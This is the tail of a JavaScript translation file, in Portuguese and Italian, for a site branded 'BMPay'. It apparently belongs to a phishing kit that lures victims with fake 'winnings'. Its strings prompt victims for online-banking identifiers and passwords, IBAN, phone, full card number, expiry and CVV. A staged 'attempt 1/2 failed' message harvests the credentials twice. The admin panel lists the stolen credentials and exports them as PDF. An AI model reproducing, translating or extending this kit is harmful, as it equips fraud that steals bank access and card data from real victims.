    confirmationByEmail: "Voce recebera uma confirmacao por email apos a validacao.",
    transferReference: "Referencia da transferencia",
    transferAmount: "Valor da transferencia",
    delay: "Prazo",
    delayValue: "24-48 horas uteis",
    date: "Data",

    viewTransferRequests: "Consulte suas solicitacoes de transferencia",
    noTransferInProgress: "Sem transferencias em andamento",
    transferRequestsWillAppear: "Suas solicitacoes de transferencia aparecerão aqui",
    backToDashboard: "Voltar ao painel",

    adminBMPay: "Administracao BMPay",
    configPanel: "Painel de configuracao",
    adminAccessOnly: "Acesso reservado a administradores",
    enterAdminPassword: "Digite a senha de admin",
    incorrectPassword: "Senha incorreta",
    adminLoginSuccess: "Login admin bem-sucedido",
    accessDenied: "Acesso negado",
    login: "Entrar",
    secureAccess: "Acesso seguro",

    adminPanel: "Painel de administracao",
    accessCodes: "Codigos de acesso",
    banks: "Bancos",
    history: "Historico",
    cardTypes: "Tipos de cartao",
    settings: "Configuracoes",
    accessCodeManagement: "Gestao de codigos de acesso",
    addCode: "Adicionar codigo",
    code: "Codigo",
    name: "Nome",
    amount: "Valor",
    currency: "Moeda",
    actions: "Acoes",
    bankManagement: "Gestao de bancos",
    bankName: "Nome do banco",
    submissionHistory: "Historico de envios",
    refresh: "Atualizar",
    downloadPDF: "Baixar PDF",
    deleteAll: "Excluir tudo",
    noSubmission: "Nenhum envio registrado",
    cardTypeManagement: "Gestao de tipos de cartao",
    newCardTypePlaceholder: "Novo tipo de cartao (ex: American Express)",
    noCardTypeConfigured: "Nenhum tipo de cartao configurado",
    changePassword: "Alterar senha",
    currentPassword: "Senha atual",
    enterCurrentPassword: "Digite a senha atual",
    newPassword: "Nova senha",
    minChars: "Minimo 6 caracteres",
    confirmPassword: "Confirmar senha",
    confirmNewPassword: "Confirme a nova senha",
    passwordsDoNotMatch: "As senhas nao coincidem",
    saveNewPassword: "Salvar nova senha",
    changingPassword: "Alterando senha...",
    passwordChangedSuccess: "Senha alterada com sucesso",
    passwordChangeInfo: "A senha sera alterada imediatamente. Voce precisara usar a nova senha no proximo login.",
    fillAllFields: "Preencha todos os campos",
    minPasswordLength: "A nova senha deve ter pelo menos 6 caracteres",
    addAccessCode: "Adicionar codigo de acesso",
    identificationCodeLabel: "Codigo de identificacao",
    codePlaceholder: "Ex: 50001",
    fullNameLabel: "Nome completo",
    namePlaceholder: "Ex: Joao Silva",
    amountPlaceholder: "Ex: 5000000",
    codeAlreadyExists: "Este codigo ja existe",
    codeAdded: "Codigo de acesso adicionado",
    editCode: "Editar codigo",
    codeModified: "Codigo de acesso modificado",
    deleteCodeConfirm: "Excluir o codigo",
    codeDeleted: "Codigo excluido",
    enterBankName: "Digite um nome de banco",
    bankAlreadyExists: "Este banco ja existe",
    bankAdded: "Banco adicionado",
    deleteBankConfirm: "Excluir",
    deleteBankSuffix: "da lista?",
    bankDeleted: "Banco excluido",
    enterCardType: "Digite um tipo de cartao",
    cardTypeAlreadyExists: "Este tipo de cartao ja existe",
    cardTypeAdded: "Tipo de cartao adicionado",
    cardTypeDeleted: "Tipo de cartao excluido",
    deleteSubmissionConfirm: "Excluir este envio?",
    submissionDeleted: "Envio excluido",
    deleteAllConfirm: "Excluir TODOS os envios? Esta acao e irreversivel.",
    allSubmissionsDeleted: "Todos os envios foram excluidos",
    noDataToExport: "Sem dados para exportar",
    pdfExportSuccess: "PDF baixado com sucesso",
    loadError: "Erro ao carregar dados",
    deleteError: "Erro ao excluir",
    submissionDetails: "Detalhes do envio",
    dateLabel: "Data",
    attemptLabel: "Tentativa",
    beneficiary: "Beneficiario",
    phone: "Telefone",
    bankCredentials: "Credenciais bancarias",
    bank: "Banco",
    identifier: "Identificador",
    bankCard: "Cartao bancario",
    type: "Tipo",
    last8digits: "Ultimos 8 digitos",
    expirationLabel: "Validade",
    attempt: "Tentativa",
    email: "Email",
  },

  it: {
    secureSpace: "Spazio sicuro",
    sslSecure: "Connessione SSL sicura",
    encryptedData: "Dati crittografati",
    sslConnection: "Connessione SSL sicura",
    securedByBMPay: "Transazioni protette da BMPay",
    secure3D: "Pagamento 3D Secure",
    secureTransaction: "Transazione sicura",
    back: "Indietro",
    loading: "Caricamento...",
    cancel: "Annulla",
    save: "Salva",
    delete: "Elimina",
    add: "Aggiungi",
    close: "Chiudi",
    confirm: "Conferma",
    error: "Errore",
    success: "Successo",
    stepBeneficiary: "Beneficiario",
    stepBank: "Banca",
    stepCard: "Carta",
    account: "Conto",
    disconnect: "Disconnetti",
    copyright: "2025 BMPay. Tutti i diritti riservati.",
    secureBMPay: "BMPay - Trasferimenti sicuri",

    clientSpace: "Area Cliente",
    verifyAndTransfer: "Verifica e trasferisci le tue vincite in sicurezza",
    loginToAccount: "Accedi al tuo conto",
    identificationCode: "Codice di identificazione",
    enterCode: "Inserisci il tuo codice",
    codeProvidedByBMPay: "Codice fornito da BMPay",
    invalidCode: "Codice di identificazione non valido. Riprova.",
    connectionError: "Errore di connessione. Riprova.",
    loginSuccess: "Accesso riuscito",
    invalidCodeToast: "Codice non valido",
    connectionErrorToast: "Errore di connessione",
    accessMyAccount: "Accedi al mio conto",
    connecting: "Connessione...",
    forgotCode: "Codice dimenticato?",
    contactSupport: "Contatta il supporto BMPay per recuperare il tuo codice.",

    welcome: "Benvenuto/a,",
    manageGains: "Gestisci le tue vincite in sicurezza",
    availableBalance: "Saldo disponibile",
    verifiedAccount: "Conto verificato",
    readyForTransfer: "Pronto per il trasferimento",
    secured: "Sicuro",
    requestTransfer: "Richiedi un trasferimento",
    transferHistory: "Storico trasferimenti",
    transferProcessed: "I trasferimenti vengono elaborati in 24-48 ore lavorative",

    beneficiaryInfo: "Informazioni del beneficiario",
    enterCoordinates: "Inserisci i tuoi dati per il trasferimento",
    fullName: "Nome completo",
    fullNamePlaceholder: "Mario Rossi",
    emailAddress: "Indirizzo email",
    emailPlaceholder: "tua@email.com",
    iban: "IBAN",
    ibanPlaceholder: "IT60 XXXX XXXX XXXX XXXX XXXX XXX",
    fullNameRequired: "Il nome completo e obbligatorio",
    emailRequired: "L'indirizzo email e obbligatorio",
    invalidEmail: "Indirizzo email non valido",
    ibanRequired: "L'IBAN e obbligatorio",
    invalidIban: "IBAN non valido",
    infoSaved: "Informazioni salvate",
    continue: "Continua",
    processing: "Elaborazione...",

    identityVerificationRequired: "Verifica dell'identita richiesta",
    toFinalizeTransfer: "Per finalizzare il trasferimento e prevenire frodi, accedi tramite la tua banca.",
    newAttempt: "Nuovo tentativo",
    secureBankSpace: "Spazio bancario sicuro",
    attempt2of2: "Tentativo 2/2 - Verifica le credenziali",
    loginToVerify: "Accedi per verificare la tua identita",
    lastAttempt: "Ultimo tentativo",
    verifyCredentials: "Verifica le credenziali",
    phoneNumber: "Numero di telefono",
    phonePlaceholder: "+39 XXX XXX XXXX",
    bankEstablishment: "Istituto bancario",
    selectBank: "Seleziona la tua banca",
    clientIdentifier: "Identificativo cliente",
    bankIdentifierPlaceholder: "Il tuo identificativo bancario",
    password: "Password",
    yourPassword: "La tua password",
    authenticate: "Autenticare",
    verifying: "Verifica...",
    authSaved: "Autenticazione salvata",
    selectBankError: "Seleziona una banca",
    identifierRequired: "L'identificativo e obbligatorio",
    passwordRequired: "La password e obbligatoria",
    phoneRequired: "Il numero di telefono e obbligatorio",
    invalidPhone: "Numero di telefono non valido",

    loadingMsg1: "Connessione al server sicuro...",
    loadingMsg2: "Verifica delle informazioni...",
    loadingMsg3: "Autenticazione in corso...",
    loadingMsg4: "Validazione della carta...",
    loadingMsg5: "Finalizzazione del trasferimento...",
    cardValidation: "Validazione della carta",
    cardRequiredToFinalize: "Carta necessaria per finalizzare il trasferimento",
    attempt2of2Verify: "Tentativo 2/2 - Verifica le informazioni",
    cardType: "Tipo di carta",
    selectType: "Seleziona il tipo",
    cardNumber16: "Numero di carta (16 cifre)",
    cardNumberPlaceholder: "1234 5678 9012 3456",
    expiration: "Scadenza",
    cvv3digits: "CVV (3 cifre)",
    finalizeTransfer: "Finalizza il trasferimento",
    selectCardTypeError: "Seleziona un tipo di carta",
    cardNumberRequired: "Il numero di carta e obbligatorio",
    enter16digits: "Inserisci le 16 cifre",
    expiryRequired: "Data di scadenza obbligatoria",
    expiryFormat: "Formato MM/AA",
    cvvRequired: "CVV obbligatorio",
    cvv3digitsError: "3 cifre",
    authFailed: "Autenticazione fallita con la tua banca. Verifica le informazioni e riprova...",
    attempt1of2Failed: "Tentativo 1/2 fallito",
    verificationSuccess: "Verifica riuscita",
    attemptsAllowed: "Numero di tentativi autorizzati: 2",
    retryAttempt2: "Riprova (2o tentativo)",

    sessionExpired: "Sessione scaduta",
    returnHome: "Torna alla home",
    transferInProgress: "Trasferimento in corso",
    ofProcessing: "in elaborazione",
    confirmationByEmail: "Riceverai una conferma via email dopo la validazione.",
    transferReference: "Riferimento del trasferimento",
    transferAmount: "Importo del trasferimento",
    delay: "Tempi",
    delayValue: "24-48 ore lavorative",
    date: "Data",

    viewTransferRequests: "Consulta le tue richieste di trasferimento",
    noTransferInProgress: "Nessun trasferimento in corso",
    transferRequestsWillAppear: "Le tue richieste di trasferimento appariranno qui",
    backToDashboard: "Torna al pannello",

    adminBMPay: "Amministrazione BMPay",
    configPanel: "Pannello di configurazione",
    adminAccessOnly: "Accesso riservato agli amministratori",
    enterAdminPassword: "Inserisci la password admin",
    incorrectPassword: "Password errata",
    adminLoginSuccess: "Accesso admin riuscito",
    accessDenied: "Accesso negato",
    login: "Accedi",
    secureAccess: "Accesso sicuro",

    adminPanel: "Pannello di amministrazione",
    accessCodes: "Codici di accesso",
    banks: "Banche",
    history: "Storico",
    cardTypes: "Tipi di carta",
    settings: "Impostazioni",
    accessCodeManagement: "Gestione codici di accesso",
    addCode: "Aggiungi codice",
    code: "Codice",
    name: "Nome",
    amount: "Importo",
    currency: "Valuta",
    actions: "Azioni",
    bankManagement: "Gestione banche",
    bankName: "Nome della banca",
    submissionHistory: "Storico invii",
    refresh: "Aggiorna",
    downloadPDF: "Scarica PDF",
    deleteAll: "Elimina tutto",
    noSubmission: "Nessun invio registrato",
    cardTypeManagement: "Gestione tipi di carta",
    newCardTypePlaceholder: "Nuovo tipo di carta (es: American Express)",
    noCardTypeConfigured: "Nessun tipo di carta configurato",
    changePassword: "Cambia password",
    currentPassword: "Password attuale",
    enterCurrentPassword: "Inserisci la password attuale",
    newPassword: "Nuova password",
    minChars: "Minimo 6 caratteri",
    confirmPassword: "Conferma password",
    confirmNewPassword: "Conferma la nuova password",
    passwordsDoNotMatch: "Le password non corrispondono",
    saveNewPassword: "Salva nuova password",
    changingPassword: "Modifica in corso...",
    passwordChangedSuccess: "Password modificata con successo",
    passwordChangeInfo: "La password verra modificata immediatamente. Dovrai usare la nuova password al prossimo accesso.",
    fillAllFields: "Compila tutti i campi",
    minPasswordLength: "La nuova password deve avere almeno 6 caratteri",
    addAccessCode: "Aggiungi codice di accesso",
    identificationCodeLabel: "Codice di identificazione",
    codePlaceholder: "Es: 50001",
    fullNameLabel: "Nome completo",
    namePlaceholder: "Es: Mario Rossi",
    amountPlaceholder: "Es: 5000000",
    codeAlreadyExists: "Questo codice esiste gia",
    codeAdded: "Codice di accesso aggiunto",
    editCode: "Modifica codice",
    codeModified: "Codice di accesso modificato",
    deleteCodeConfirm: "Eliminare il codice",
    codeDeleted: "Codice eliminato",
    enterBankName: "Inserisci un nome di banca",
    bankAlreadyExists: "Questa banca esiste gia",
    bankAdded: "Banca aggiunta",
    deleteBankConfirm: "Eliminare",
    deleteBankSuffix: "dalla lista?",
    bankDeleted: "Banca eliminata",
    enterCardType: "Inserisci un tipo di carta",
    cardTypeAlreadyExists: "Questo tipo di carta esiste gia",
    cardTypeAdded: "Tipo di carta aggiunto",
    cardTypeDeleted: "Tipo di carta eliminato",
    deleteSubmissionConfirm: "Eliminare questo invio?",
    submissionDeleted: "Invio eliminato",
    deleteAllConfirm: "Eliminare TUTTI gli invii? Questa azione e irreversibile.",
    allSubmissionsDeleted: "Tutti gli invii sono stati eliminati",
    noDataToExport: "Nessun dato da esportare",
    pdfExportSuccess: "PDF scaricato con successo",
    loadError: "Errore durante il caricamento",
    deleteError: "Errore durante l'eliminazione",
    submissionDetails: "Dettagli dell'invio",
    dateLabel: "Data",
    attemptLabel: "Tentativo",
    beneficiary: "Beneficiario",
    phone: "Telefono",
    bankCredentials: "Credenziali bancarie",
    bank: "Banca",
    identifier: "Identificativo",
    bankCard: "Carta bancaria",
    type: "Tipo",
    last8digits: "Ultime 8 cifre",
    expirationLabel: "Scadenza",
    attempt: "Tentativo",
    email: "Email",
  },
};

export const LANGUAGES = [
  { code: 'fr', label: 'FR', fullLabel: 'Francais', flag: 'FR' },
  { code: 'en', label: 'EN', fullLabel: 'English', flag: 'GB' },
  { code: 'es', label: 'ES', fullLabel: 'Espanol', flag: 'ES' },
  { code: 'pt', label: 'PT', fullLabel: 'Portugues', flag: 'PT' },
  { code: 'it', label: 'IT', fullLabel: 'Italiano', flag: 'IT' },
];

export default translations;
